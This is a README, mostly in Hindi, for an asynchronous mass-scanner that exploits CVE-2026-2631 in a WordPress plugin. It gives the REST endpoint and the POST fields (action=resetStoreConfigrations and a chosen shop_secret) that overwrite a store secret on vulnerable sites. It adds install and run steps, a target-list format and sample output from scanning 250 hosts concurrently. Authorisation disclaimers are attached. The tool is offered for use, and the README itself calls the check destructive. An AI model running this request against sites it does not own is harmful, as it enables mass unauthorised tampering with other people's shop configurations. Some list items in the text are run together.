
अधिकृत आंतरिक परीक्षण के लिए CVE-2026-2631 एक्सपोज़र की async मास-जाँचकर्ता।
आंतरिक WordPress सत्यापन के लिए निजी एसिंक मास-चेकर
यह टूल एक विनाशकारी सत्यापन करता है।
यह लक्ष्य एंडपॉइंट पर एक POST अनुरोध भेजता है और कमजोर लक्ष्यों पर
shop_secretबदल सकता है।इसका उपयोग केवल उन सिस्टमों पर करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपको स्पष्ट रूप से अधिकृत किया गया है।
यह प्रोजेक्ट एक हल्का एसिंक्रोनस मास-चेकर है जो स्वामित्व वाले WordPress लक्ष्यों और सबडोमेन पर CVE-2026-2631 एक्सपोज़र के निजी सत्यापन के लिए बनाया गया है।
स्कैनर को निम्नलिखित के लिए डिज़ाइन किया गया है:
यह रिपॉजिटरी केवल निजी/आंतरिक उपयोग के लिए है।
aiohttp के साथ एसिंक स्कैनिंगvuln_results.txt में स्वचालित लॉगिंगrich इंस्टॉल होने पर समृद्ध रंगीन आउटपुटस्कैनर निम्नलिखित पर अनुरोध भेजता है:
/wp-json/gsf/v1/update-options
यह निम्नलिखित सत्यापन फ़ील्ड के साथ POST अनुरोध का उपयोग करता है:
action=resetStoreConfigrationsshop_secret=<कस्टम या डिफ़ॉल्ट मान>एक लक्ष्य को कमजोर तब चिह्नित किया जाता है जब:
200 हो, औरस्कैनर स्पष्ट गलत-सकारात्मक को कम करने के लिए एक सरल त्रुटि-पैटर्न फ़िल्टर भी लागू करता है।
aiohttprich (वैकल्पिक, रंगीन आउटपुट के लिए)निर्भरताएँ इंस्टॉल करें:
pip install aiohttp rich
अपनी लक्ष्य फ़ाइल तैयार करें, उदाहरण के लिए list.txt:
example.com
sub.example.com
https://app.example.com
http://dev.example.com
स्कैनर चलाएँ:
python main.py
स्क्रिप्ट निम्नलिखित के लिए संकेत देगी:
YES)shop_secret मानडिफ़ॉल्ट मानों में शामिल हैं:
list.txt2010 सेकंड #####################################################################
# CVE-2026-2631 Scanner - Async Mass Checker (Author AnggaTechI) #
# Only vulnerable targets will be shown and logged. #
# WARNING: This test CHANGES shop_secret on vulnerable #
# sites. Use only with permission. #
# https://github.com/AnggaTechI #
#####################################################################
⚠️ DESTRUCTIVE OPERATION WARNING
This script will change shop_secret on vulnerable sites.
Scanning 250 targets with 20 concurrent requests...
Only vulnerable sites will appear below.
https://target.tld -> Vuln Found
https://sub.target.tld -> Vuln Found
[Progress] 50/250 scanned...
[Progress] 100/250 scanned...
=== Scan Complete ===
Total targets : 250
Vulnerable found : 2
Errors (by type) :
- timeout: 4
- connection: 7
सकारात्मक निष्कर्ष निम्नलिखित में सहेजे जाते हैं:
vuln_results.txt
केवल कमजोर पहचाने गए लक्ष्य ही परिणाम फ़ाइल में लिखे जाते हैं।
यह रिपॉजिटरी केवल निजी शोध और आंतरिक सत्यापन उद्देश्यों के लिए बनाए रखी गई है।
लेखक इस टूल के अनुचित संचालन के कारण होने वाले दुरुपयोग, अनधिकृत स्कैनिंग, सेवा व्यवधान या कॉन्फ़िगरेशन परिवर्तनों के लिए जिम्मेदार नहीं है।
जिम्मेदारी से उपयोग करें। सावधानी से उपयोग करें। केवल अनुमति के साथ उपयोग करें।
AnggaTechI
आंतरिक वर्कफ़्लो के लिए निजी सुरक्षा टूलिंग।